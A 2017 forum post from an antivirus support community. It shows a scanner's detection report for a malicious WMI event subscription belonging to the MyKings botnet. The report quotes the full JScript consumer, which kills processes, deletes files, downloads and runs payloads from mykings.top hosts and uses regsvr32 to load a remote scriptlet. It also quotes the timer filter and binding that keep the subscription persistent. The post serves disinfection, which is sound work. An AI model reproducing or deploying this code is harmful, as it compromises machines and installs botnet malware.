safety 8 Posted June 20, 2017 Share Posted June 20, 2017 At the forum forum.esetnod32.ru we solve the problem with WMI scripts using the program Universal Virus Sniffer https://forum.esetnod32.ru/forum6/topic14074/ Quote Полное имя WMI_ACTIVESCRIPTEVENTCONSUMER\YOUMM2_CONSUMER.[YOUMM2_FILTER] Имя файла YOUMM2_CONSUMER.[YOUMM2_FILTER] Тек. статус ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске Удовлетворяет критериям WMI_ACTIVESCRIPTEVENTCONSUMER(CONSUMER_NAME ~ YOUMM2_CONSUMER)(1) [delall (0)] Сохраненная информация на момент создания образа Статус в автозапуске Namespace \\.\root\subscription Consumer_Name youmm2_consumer Consumer_Class ActiveScriptEventConsumer Consumer_ScriptingEngine Jscript Consumer_ScriptText var toff=3000;var url1 = "][ттп://wmi.mykings.top:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for (i = 0; i < arr.length; i++) { t = arr.split(" "); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run("taskkill /f /im " + proc, 0, true);if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };var locator=new ActiveXObject("WbemScripting.SWbemLocator");var service=locator.ConnectServer(".","root/cimv2");var colItems=service.ExecQuery("select * from Win32_Process");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption=="rundll32.exe")p.Terminate()};var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get("Win32_Process");var url="][ттп://wmi.mykings.top:8888/test.html",http=new ActiveXObject("Microsoft.XMLHTTP"),ado=new ActiveXObject("ADODB.Stream"),wsh=new ActiveXObject("WScript.Shell");for(http.open("GET",url,!1),http.send(),str=http.responseText,arr=str.split("\r\n"),i=0;arr.length>i;i++)t=arr.split(" ",3),http.open("GET",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);pp.create("regsvr32 /s shell32.dll");pp.create("regsvr32 /s WSHom.Ocx");pp.create("regsvr32 /s scrrun.dll");pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");pp.create("regsvr32 /s jscript.dll");pp.create("regsvr32 /u /s /i:][ттп://js.mykings.top:280/v.sct scrobj.dll");pp.create("rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa"); Filter_Name youmm2_filter Filter_Class __EventFilter Filter_Query select * from __timerevent where timerid="youmm2_itimer" #MOF_Bind# instance of __FilterToConsumerBinding { Consumer = "\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name="youmm2_consumer""; Filter = "\\\\.\\root\\subscription:__EventFilter.Name="youmm2_filter""; }; #MOF_Event# instance of __EventFilter { Name = "youmm2_filter"; Query = "select * from __timerevent where timerid="youmm2_itimer""; QueryLanguage = "wql"; }; Link to comment Share on other sites More sharing options...
Recommended Posts